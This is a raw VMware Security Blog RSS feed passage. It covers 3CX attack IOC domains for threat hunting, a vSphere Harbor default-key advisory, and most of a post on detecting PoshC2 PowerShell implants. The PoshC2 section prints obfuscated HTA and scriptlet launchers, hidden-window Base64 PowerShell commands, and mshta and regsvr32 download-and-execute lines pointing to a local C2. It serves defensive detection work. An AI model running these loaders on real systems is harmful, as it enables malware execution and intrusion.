href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM.png"><img
decoding="async" loading="lazy" class="alignnone size-large wp-image-83436"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-1024x467.png"
alt="" width="1024" height="467"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-1024x467.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-300x137.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-768x351.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-1536x701.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-2048x935.png
2048w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-31-at-9.49.15-AM-600x274.png
600w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></span></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">2</span></i><i><span data-contrast="none">: User interface
of NSX Guest Introspection Malware Prevention Service.</span></i><span
data-ccp-props="{"201341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p>
<ul> <li data-leveltext="-" data-font="Calibri" data-listid="1"
data-list-defn-props="{"335551671":0,"335552541":1,"335559684":-2,"335559685":720,"335559991":360,"469769226":"Calibri","469769242":[8226],"469777803":"left","469777804":"-","469777815":"hybridMultilevel"}"
aria-setsize="-1" data-aria-posinset="0" data-aria-level="1"><b><span
data-contrast="auto">NSX ATP Standalone</span></b><span data-contrast="auto">
customers can also increase upload limits to support analyzing large files (up
to 100MB on on-premise, see the following article for instructions on how to
change this: </span><a href="https://kb.vmware.com/s/article/900100?lang=en_US"
target="_blank" rel="noopener">INSTRUCTIONS</a><span data-contrast="auto">), and
threat hunt for the associated malicious network activity via the Network
Explore console using the following search query: </span><i><span
data-contrast="auto">“akamaicontainer.com OR akamaitechcloudservices.com OR
azuredeploystore.com OR azureonlinecloud.com OR azureonlinestorage.com OR
dunamistrd.com OR glcloudservice.com OR journalide.org OR msedgepackageinfo.com
OR msstorageazure.com OR msstorageboxes.com OR officeaddons.com OR
officestoragebox.com OR pbxcloudeservices.com OR pbxphonenetwork.com OR
pbxsources.com OR sbmsa.wiki OR sourceslabs.com OR visualstudiofactory.com OR
zacharryblogs.com OR </span></i><span
data-contrast="none">qwepoi123098.com</span><i><span
data-contrast="auto">”.</span></i><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></li>
</ul> <p><span
data-ccp-props="{"201341983":0,"335559685":720,"335559739":160,"335559740":259}"> </span></p><p>The
post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html">Investigating
3CX Desktop Application Attacks: What You Need to Know</a> appeared first on <a
rel="nofollow" href="https://blogs.vmware.com/security">VMware Security
Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>Embedded vSphere Harbor default enablement results in an insecure
configuration</title>
<link>https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html?utm_source=rss&utm_medium=rss&utm_campaign=embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration</link>
<dc:creator>
<![CDATA[ Monty Ijzerman ]]>
...
</dc:creator>
<pubDate>Fri, 31 Mar 2023 05:23:42 +0000</pubDate>
<category>
<![CDATA[ VMware Security Response Center ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83429</guid>
<description>
<![CDATA[ <div><img width="300" height="158"
src="https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-300x158.jpg"
class="attachment-medium size-medium wp-post-image" alt="Server Advanced
Workload Protection" decoding="async" loading="lazy" style="margin-bottom:
10px;"
srcset="https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-300x158.jpg
300w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-1024x540.jpg
1024w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-768x405.jpg
768w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-1536x810.jpg
1536w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-600x317.jpg
600w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311.jpg
1600w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>This post is relevant
to administrators that have enabled the embedded Harbor version in vSphere 7.0
or 8.0 as explained in Enable the Embedded Harbor Registry on the Supervisor
Cluster. Harbor-helm issue Harbor when installed with harbor-helm will use a
default key pair if no key pair is specified in core.secretName in values.yaml.
This default … <a
href="https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html">Embedded
vSphere Harbor default enablement results in an insecure configuration</a>
appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="158"
src="https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-300x158.jpg"
class="attachment-medium size-medium wp-post-image" alt="Server Advanced
Workload Protection" decoding="async" loading="lazy" style="margin-bottom:
10px;"
srcset="https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-300x158.jpg
300w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-1024x540.jpg
1024w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-768x405.jpg
768w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-1536x810.jpg
1536w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311-600x317.jpg
600w,
https://blogs.vmware.com/security/files/2022/08/150DPIx-AdobeStock_192613311.jpg
1600w" sizes="(max-width: 300px) 100vw, 300px" /></div><p>This post is relevant
to administrators that have enabled the embedded Harbor version in vSphere 7.0
or 8.0 as explained in <a
href="https://docs.vmware.com/en/VMware-vSphere/7.0/vmware-vsphere-with-tanzu/GUID-AE24CF79-3C74-4CCD-B7C7-757AD082D86A.html#GUID-AE24CF79-3C74-4CCD-B7C7-757AD082D86A">Enable
the Embedded Harbor Registry on the Supervisor Cluster</a>.</p>
<p><strong>Harbor-helm issue</strong><br /> Harbor when installed with
harbor-helm will use a default key pair if no key pair is specified in
core.secretName in values.yaml. This default key pair is public and can be used
to sign the JWT token. This token allows for pulling and pushing images in
Harbor. See here for the <a
href="https://github.com/goharbor/harbor/security/advisories/GHSA-j7jh-fmcm-xxwv">Harbor-helm
advisory</a> which documents the issue.</p> <p><strong>vSphere</strong><br />
The embedded Harbor registry on a vSphere Supervisor has an insecure
configuration due to the Harbor-helm issue. Normally, projects on an embedded
Harbor registry are private and 1:1 mapped to Supervisor namespaces, and only
users with proper permissions to Supervisor namespaces can pull / push images to
the corresponding Harbor projects. However, this issue can break the isolation
and protection of the container image access in those projects.<br /> The issue
is present in all current versions of vSphere prior to vCenter Server 7.0 U3l
and vCenter Server 8.0c that have the embedded Harbor enabled and that have not
changed the default configuration.</p> <p><strong>Existing enabled embedded
Harbor registry in vSphere</strong><br /> VMware advises customers that have
enabled the embedded Harbor version in vSphere and that have not changed the
default configuration, to:<br /> – Deploy vCenter Server 7.0 U3l or
vCenter Server 8.0c which address the issue for existing embedded Harbor
registries that are enabled by removing the default key pair, or<br /> –
Change the default configuration by following the temporary workaround steps
listed in <a href="http://kb.vmware.com/kb/91452">VMware Knowledge Base article
91452</a>.</p> <p><strong>Newly enabled embedded Harbor in vSphere</strong><br
/> In case the embedded Harbor registry is enabled on vCenter Server 7.0 U3l or
vCenter Server 8.0c, the issue is not present.</p> <p><strong>Note</strong><br
/> The VMware Harbor Container Registry for Tanzu Kubernetes Grid Integrated
Edition is not installed through Harbor-helm and therefor it doesn’t have the
Harbor insecure default installation.</p> <p><strong>Acknowledgement</strong><br
/> VMware would like to thank Sam Erb from Google for reporting this issue to
us.</p><p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html">Embedded
vSphere Harbor default enablement results in an insecure configuration</a>
appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>How to Detect PoshC2 PowerShell Implants</title>
<link>https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html?utm_source=rss&utm_medium=rss&utm_campaign=how-to-detect-poshc2-powershell-implants</link>
<dc:creator>
<![CDATA[ Oleg Boyarchuk ]]>
...
</dc:creator>
<pubDate>Fri, 24 Mar 2023 21:03:01 +0000</pubDate>
<category>
<![CDATA[ Threat Analysis Unit ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83405</guid>
<description>
<![CDATA[ <div><img width="300" height="157"
src="https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-300x157.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/ ]]>
<![CDATA[ files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-300x157.png 300w,
https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-1024x535.png
1024w,
https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-768x402.png
768w, https://blogs.vmware.co ]]>
<![CDATA[
m/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-600x314.png 600w,
https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4.png
1201w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>PoshC2 is a
proxy-aware cross-platform C2 framework that natively supports Docker. Once
configured and executed, it generates over 100 modifications of fresh implants,
written in PowerShell, C#, and Python. The framework has a modular architecture
to enable users to add their own modules and tools. No wonder, that nowadays
PoshC2 is one of the most … <a
href="https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html">How
to Detect PoshC2 PowerShell Implants</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="157"
src="https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-300x157.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/ ]]>
<![CDATA[ files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-300x157.png 300w,
https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-1024x535.png
1024w,
https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-768x402.png
768w, https://blogs.vmware.co ]]>
<![CDATA[
m/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-600x314.png 600w,
https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4.png
1201w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><span
data-contrast="auto">PoshC2 is a proxy-aware cross-platform C2 fram ]]>
<![CDATA[ ework that natively supports Docker. Once configured and
executed</span><b><span data-contrast="auto">, </span></b><span
data-contrast="auto">it generates over 100 modifications of fresh implants,
written in PowerShell, C#, and Python. The framework has a modular architecture
to enable users to ad ]]>
<![CDATA[ d their own modules and tools. No wonder, that nowadays PoshC2 is
</span><a
href="https://twitter.com/teamcymru_s2/status/1604091964386705409"><span
data-contrast="none">one of the</span></a><span data-contrast="auto"> most
popular C2 frameworks, and it is routinely used to aid penetration testers w ]]>
<![CDATA[ ith red teaming, post-exploitation, and lateral movement
capabilities.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><span data-contrast="auto">In May 2020, Nettitude, the creator and the
maintainer of PoshC2 </span><a hre ]]>
<![CDATA[ f="https://labs.nettitude.com/blog/introducing-poshc2-v6-0/"><span
data-contrast="none">released</span></a><span data-contrast="auto"> the
6</span><span data-contrast="auto">th</span><span data-contrast="auto"> version
of the framework. Shortly thereafter, Nettitude also </span><a
href="https://labs ]]>
<![CDATA[ .nettitude.com/blog/detecting-poshc2-indicators-of-compromise/"><span
data-contrast="none">published</span></a><span data-contrast="auto"> techniques
that could be used to detect its footprint, including communication of the
implant with the backend, the behavior of the implant during execution, and ]]>
<![CDATA[ its static fingerprint. What it did not include, however, was an
investigation of the delivery methods using proxy tools such as regsvr32.exe or
mshta.exe and details of the underlying implementation. In this blog post, we
plan to fill this gap by looking into the details of the PowerShell implant ]]>
<![CDATA[ generation phase; we will detail the main implementations and conclude
with some detection suggestions.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<h2 aria-level="1"><span data-contrast="none">Generation of PowerShell Impl ]]>
<![CDATA[ ants</span></h2> <p><span data-contrast="auto">As with any other C2
framework, generating an implant is a process that is tightly coupled with
configuring the server. In PoshC2, the user bootstraps the process using the
commands </span><i><span data-contrast="auto">posh-project -n project-name</span
]]>
<![CDATA[ ></i><span data-contrast="auto">, </span><i><span
data-contrast="auto">posh-config project-name,</span></i><span
data-contrast="auto"> and </span><i><span
data-contrast="auto">posh-server.</span></i><span
data-contrast="auto"> </span><span
data-ccp-props="{"201341983":0,"335559739&qu ]]>
<![CDATA[ ot;:160,"335559740":259}"> </span></p> <p><span
data-contrast="auto">The command</span><i><span data-contrast="auto">
posh-config</span></i><span data-contrast="auto"> opens the configuration file
for editing (default configuration can be seen in </span><span
data-contrast="auto">Figure 1 ]]>
<![CDATA[ </span><span data-contrast="auto">), which allows setting up many
parameters, including </span><i><span
data-contrast="auto">PayloadCommsHost</span></i><span data-contrast="auto">,
which contains a list of C2 addresses that the server would listen on. For
convenience, we will be querying the gener ]]>
<![CDATA[ ated backend URLs on the same host of the server, therefore we will
use the default value </span><i><span
data-contrast="auto">https://127.0.0.1</span></i><span data-contrast="auto"> as
the C2 URL.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":2
]]>
<![CDATA[ 59}"> </span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83406"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-1024x579.png"
alt ]]>
<![CDATA[ ="" width="800" height="452"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-1024x579.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-300x170.png
300w, https://blogs.vmware.com/security/files/2023/03/Scree ]]>
<![CDATA[ n-Shot-2023-03-24-at-11.57.49-AM-768x434.png 768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-1536x868.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-600x339.png
600w, https://blogs.vmware.com/security/files ]]>
<![CDATA[ /2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM.png 1610w"
sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i><span
data-contrast="none">Figure </span></i><i><span
data-contrast="none">1</span></i><i><span data-contrast="none">: Configuration
file, opened by posh-config.</span></i><span data-cc ]]>
<![CDATA[
p-props="{"201341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p>
<p><span data-contrast="auto">The command</span><i><span data-contrast="auto">
posh-server</span></i><span data-contrast="auto">, as the name suggests ]]>
<![CDATA[ , starts the server. This command also generates over 100
modifications of payloads, which are dropped in
/var/poshc2/project-name/payloads.</span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM.png"><img
decoding="async" loading="lazy" class="a ]]>
<![CDATA[ lignnone wp-image-83407"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-1024x771.png"
alt="" width="800" height="603"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-1024x771.png
1024w, https://blogs.vmware.com ]]>
<![CDATA[
/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-300x226.png 300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-768x578.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-1536x1157.png
1536w, https://b ]]>
<![CDATA[
logs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-600x452.png
600w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM.png
1596w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><em><span
class="TextRun SCXW172436151 BCX2" lang="EN- ]]>
<![CDATA[ US" xml:lang="EN-US" data-contrast="none"><span class="NormalTextRun
SCXW172436151 BCX2" data-ccp-parastyle="caption">Figure </span></span><span
class="FieldRange SCXW172436151 BCX2"><span class="TextRun SCXW172436151 BCX2"
lang="EN-US" xml:lang="EN-US" data-contrast="none"><span class="NormalTextRu ]]>
<![CDATA[ n SCXW172436151 BCX2"
data-ccp-parastyle="caption">2</span></span></span><span class="TextRun
SCXW172436151 BCX2" lang="EN-US" xml:lang="EN-US" data-contrast="none"><span
class="NormalTextRun SCXW172436151 BCX2" data-ccp-parastyle="caption">:
</span><span class="NormalTextRun SCXW172436151 BCX2" dat ]]>
<![CDATA[ a-ccp-parastyle="caption">PoshC2 suggests different methods of
execution of a PowerShell implant, created by the posh-server
command.</span></span></em></p> <p><span data-contrast="auto">As shown in
</span><span data-contrast="auto">Figure 2</span><span data-contrast="auto">,
PoshC2 suggests six dif ]]>
<![CDATA[ ferent methods for executing a PowerShell implant: (1) straight from
the disk, after renaming the raw implant (stored by PoshC2 in payload.txt) and
changing the extension to .ps1; (2) passed to PowerShell as a command line
argument (using the file payload.bat generated by PoshC2); (3) delivered via ]]>
<![CDATA[ a short PowerShell one-liner; (4) executed by mshta.exe as an HTA
payload; (5) as a scriptlet pulled from the Internet by regsvr32.exe; (6) or,
again, executed by mshta.exe but in this instance with the help of an inline
VBScript.</span><span data-ccp-props="{"201341983":0,"335559739&
]]>
<![CDATA[ quot;:160,"335559740":259}"> </span></p> <h2
aria-level="1"><span data-contrast="none">Execution via Proxy Tools</span></h2>
<p><span data-contrast="auto">Using Living Off the Land Binaries (LOLBins),
e.g., mshta.exe and regsvr32.exe, is a widely adopted MITRE technique (</span><a
href="h ]]>
<![CDATA[ ttps://attack.mitre.org/techniques/T1218/"><span
data-contrast="none">T.1218</span></a><span data-contrast="auto">) often used to
break the malware delivery process into a chain of events designed to hinder
detection. PoshC2 can, for example, rely on mshta.exe to proxy the execution of
malicious VBS ]]>
<![CDATA[ cripts, JScripts, and PowerShell scripts. The technique is implemented
by generating a file called Launcher.hta. This file features obfuscated strings
(“Wscript.Shell” is split into chunks for example) and a Base64-encoded
PowerShell implant, both simple yet effective techniques to bypass static ]]>
<![CDATA[ detection: </span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong><i><script></i></strong></p> <p><strong><i>ao=new
ActiveXObject(“W”+”S”+”cr”+”ip”+”t.”
]]>
<![CDATA[
+”Sh”+”e”+”l”+”l”);</i></strong></p>
<p><strong><i>ao.run(‘powershell -exec bypass -Noninteractive -windowstyle
hidden -e
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUg</i><i>BlAGEA</i></strong></p>
<p><strong><i>ZABlAHIAKAAoA ]]>
<![CDATA[
E4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMA</i></strong></p>
<p><strong><i><…></i></strong></p>
<p><strong><i>G0AcAByAGUAcwBzACkAKQAsAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdA</i></strong></p>
<p><strong><i>DoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQ ]]>
<![CDATA[ AKAApAA==’, 0);window.close();</i></strong></p>
<p><strong><i></script></i></strong><span
data-ccp-props="{"201341983":0,"335559685":720,"335559739":0,"335559740":240}"> </span></p>
<p><span data-contrast="auto">Execution of powershell.exe with lo ]]>
<![CDATA[ ng arguments (in our case the Base64-encoded implant is more than 6000
characters long) should be considered a strong indicator of suspicious
activity. </span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><span data-contrast="aut ]]>
<![CDATA[ o">Malicious HTA files can also be executed through an inline script.
This hides the code of the implant and thereby also reduces the risk of a
signature able to target it:</span></p> <p><strong><i>mshta.exe
‘vbscript:GetObject(“script:https://127.0.0.1/Philips/v902/_cs”)(window.cl
]]>
<![CDATA[ ose)’</i> </strong></p> <p><span data-contrast="auto">In
comparison to Launcher.hta, the code of the HTA payload, retrieved by the inline
VBScript, relies on the </span><i><span
data-contrast="auto">Shell.Application</span></i><span data-contrast="auto">
ActiveX object rather than </span><i>< ]]>
<![CDATA[ span data-contrast="auto">Wscript.Shell</span></i><span
data-contrast="auto">; also, tags like </span><i><span
data-contrast="auto">Scriptlet</span></i><span data-contrast="auto"> and
</span><i><span data-contrast="auto">Script</span></i><span
data-contrast="auto"> are now mangled; however, the same ]]>
<![CDATA[ PowerShell Base64-encoded command to execute the implant is used. All
these techniques, again, are employed to make static analysis more
difficult:</span><span
data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p>
<p><strong><i>john@ubuntu:~$ cur ]]>
<![CDATA[ l -k https://127.0.0.1/Philips/v902/_cs</i> </strong></p>
<p><strong><i><sCrIptlEt><scRIPt></i></strong></p>
<p><strong><i>a=new
ActiveXObject(“Shell.Application”).ShellExecute(“powershell.exe”,”
-exec bypass -Noninteractive -windowstyle hidden -e SQBFAFgAK ]]>
<![CDATA[ ABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZ</i></strong></p>
<p><strong><i>QBhAG0AUgBlAGEAZABlAHIAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTA</i></strong></p>
<p><strong><i>HkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMA</i></strong></p>
<p><strong><i><…></i></strong></p> <p><strong><i>G0AcAB ]]>
<![CDATA[
yAGUAcwBzACkAKQAsAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBB</i></strong></p>
<p><strong><i>AFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApAA==”,””,”open”,”0″);</i></strong></p>
<p><strong><i></scRIPt></sCrIptlEt></i> </strong></p> <p><spa ]]>
<![CDATA[ n data-contrast="auto">Another method to proxy PowerShell execution is
to use regsvr32.exe in combination with scrobj.dll, as shown below.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong><i>regsvr32 /s /n /u /i:https ]]>
<![CDATA[ ://127.0.0.1/Philips/v902/_rg scrobj.dll</i> </strong></p> <p><span
data-contrast="auto">Loaded by regsvr32.exe, scrobj.dll will download and
execute the scriptlet, hosted by the server component of PoshC2. This scriptlet
uses the</span><i><span data-contrast="auto"> Shell.Application</span></i><sp
]]>
<![CDATA[ an data-contrast="auto"> ActiveX object to execute powershell.exe with
the Base64-encoded implant execution command passed as an argument:</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong><i>john@ubuntu:~$ curl -k htt ]]>
<![CDATA[ ps://127.0.0.1/Philips/v902/_rg</i> </strong></p>
<p><strong><i><?XML version=”1.0″?></i></strong></p>
<p><strong><i><scriptlet></i></strong></p>
<p><strong><i><registration</i></strong></p> <p><strong><i>
progid=”PoC”</i></strong></p> <p><strong><i> ]]>
<![CDATA[ classid=”{F0001111-0000-0000-0000-0000FEEDACDC}”
></i></strong></p> <p><strong><i><script
language=”VBScript”></i></strong></p> <p><strong><i>Dim
ghgfhgfh</i></strong></p> <p><strong><i>set ghgfhgfh =
CreateObject(“shell.application”)</i></strong></p> ]]>
<![CDATA[ <p><strong><i>ghgfhgfh.ShellExecute “powershell.exe”,
” -exec bypass -Noninteractive -windowstyle hidden -e
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUg</i></strong></p>
<p><strong><i>BlAGEAZABlAHIAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE
]]>
<![CDATA[ M</i></strong></p> <p><strong><i><…></i></strong></p>
<p><strong><i>GQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQAsAFsAVABlAHgAdAAuAEU</i></strong></p>
<p><strong><i>AbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApAA==”,
“”, “open̶ ]]>
<![CDATA[ 1;, 0</i></strong></p> <p><strong><i></script></i></strong></p>
<p><strong><i></registration></i></strong></p>
<p><strong><i></scriptlet></i> </strong></p> <p><span
data-contrast="auto">Both HTA code and scriptlets feature the same
powershell.exe command line parameters, including ]]>
<![CDATA[ the Base64-encoded PowerShell command that ultimately executes the
implant. PoshC2 stores the whole command line inside payload.bat, which can be
either executed on a remote system as-is or become part of a bigger execution
chain. The Base64-encoded PowerShell command contains another layer of obfu ]]>
<![CDATA[ scation – another Base64-encoded PowerShell script that is also
packed:</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
<p><strong><i>IEX(New-Object IO.StreamReader((New-Object
System.IO.Compression.GzipStream([IO.MemoryStrea ]]>
<![CDATA[
m][Convert]::FromBase64String(‘H4sIAIec/GMC/51XW3PayBJ+16+YVekBJUhc4mDHFFVry2RNObYpIM7uUq6tQWpggpCU0SiYZfnv2z0jLnE2l</i> </strong></p>
<p><strong><i><…></i></strong></p>
<p><strong><i>BXQg3I0aEY9pesli2Yz5M7+vtHe35Xg7s9DxaXyhjFAZtQdpJTKzf8XrGmEUKjMjm4dy9ta/wJPgY69ig4AAA==’),[
]]>
<![CDATA[
IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()</i></strong><span
data-ccp-props="{"201341983":0,"335559685":720,"335559739":0,"335559740":240}"><br
/> </span></p> <p><span data-contrast="auto">The packed code is the main Pow ]]>
<![CDATA[ erShell implant (which can be found inside payload.txt). Before diving
into the details of its implementation, there is one last delivery method to
analyze: the PowerShell stager.</span><span
data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p>
]]>
<![CDATA[ <h2 aria-level="1"><span data-contrast="none">Execution via PowerShell
Stagers</span><span
data-ccp-props="{"134245418":true,"134245529":true,"201341983":0,"335559738":240,"335559739":0,"335559740":259}"> </span></h2>
<p><span data-contra ]]>
<![CDATA[ st="auto">Similarly to the inline scripts used with mshta.exe and
regsvr32.exe, PoshC2 provides a short PowerShell one-liner to download and
execute the main PowerShell implant. As </span><span data-contrast="auto">Figure
3</span><span data-contrast="auto"> highlights, most of the Base64-encoded com
]]>
<![CDATA[ mand does not change at all, which makes it a perfect candidate for a
detection rule.</span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83408"
src="https://blogs.vmware.com/ ]]>
<![CDATA[
security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-1024x159.png"
alt="" width="800" height="124"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-1024x159.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49
]]>
<![CDATA[ .44-PM-300x47.png 300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-768x119.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-600x93.png
600w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-2 ]]>
<![CDATA[ 4-at-12.49.44-PM.png 1506w" sizes="(max-width: 800px) 100vw, 800px"
/></a></p> <p><i><span data-contrast="none">Figure </span></i><i><span
data-contrast="none">3</span></i><i><span data-contrast="none">: Two different
builds of the PowerShell one-liner.</span></i></p> <p><span
data-contrast="auto">T ]]>
<![CDATA[ he Base64-encoded command employs </span><i><span
data-contrast="auto">System.Net.WebClient</span></i><span data-contrast="auto">
to download the main PowerShell implant, which is later executed with the
</span><i><span data-contrast="auto">IEX</span></i><span data-contrast="auto">
command. As shown ]]>
<![CDATA[ in the figure below, the URL is the only parameter that is responsible
for the changes in the Base64 encoding.</span></p> <p><a
